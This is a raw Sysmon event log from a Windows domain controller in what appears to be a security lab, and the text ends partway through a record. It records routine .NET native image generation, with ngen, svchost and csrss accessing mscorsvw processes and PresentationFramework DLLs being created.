10341000x80000000000000008188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.228{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.165{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F003-00000000A301}2512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.150{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F003-00000000A301}2512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.150{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F003-00000000A301}2512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:21.087{59A5CD1D-921C-6005-EF03-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b08-0\PresentationFramework.Aero.dll2021-01-18 13:50:21.087 10341000x80000000000000008218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.759{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.759{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.603{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F803-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.587{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F803-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.587{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F803-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:22.525{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ec8-0\PresentationFramework.Royale.dll2021-01-18 13:50:22.525 10341000x80000000000000008211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.306{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.306{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F603-00000000A301}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.228{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F603-00000000A301}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.228{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F603-00000000A301}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:22.165{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d8-0\PresentationFramework.Luna.dll2021-01-18 13:50:22.165 10341000x80000000000000008225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.728{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.728{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921F-6005-FA03-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.603{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921F-6005-FA03-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.603{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921F-6005-FA03-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 